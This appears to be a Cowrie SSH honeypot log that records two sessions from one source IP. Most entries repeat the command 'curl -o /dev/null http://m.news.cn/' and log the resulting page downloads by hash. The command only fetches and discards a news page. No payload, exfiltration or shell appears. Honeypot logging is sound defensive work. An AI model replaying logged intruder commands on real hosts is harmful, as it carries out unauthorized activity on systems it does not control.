{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.518382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.544472Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.546985Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.547652Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.553903Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.554535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.559563Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.567169Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.580771Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.584339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.585148Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.589280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.589826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.628442Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.629467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.631256Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.632031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.668766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.669722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.673048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.673845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.697508Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.699218Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.708084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.708849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.712461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.713480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.719326Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.722247Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.724913Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.731857Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.743454Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.746061Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.746876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.751130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.754219Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.754937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.763613Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.782773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.783872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.789055Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.797038Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.797852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.814347Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.817974Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.822026Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.822887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.827329Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.828594Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.836449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.837223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.847752Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.861714Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.862518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.876374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.877186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.900480Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.904077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.904743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.915640Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.916456Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.941107Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.942219Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.942916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.947989Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.952837Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.954817Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.955429Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.968793Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.978642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.980595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.981303Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.986089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.987589Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.990022Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:26.993405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.994029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:26.997153Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:27.001787Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
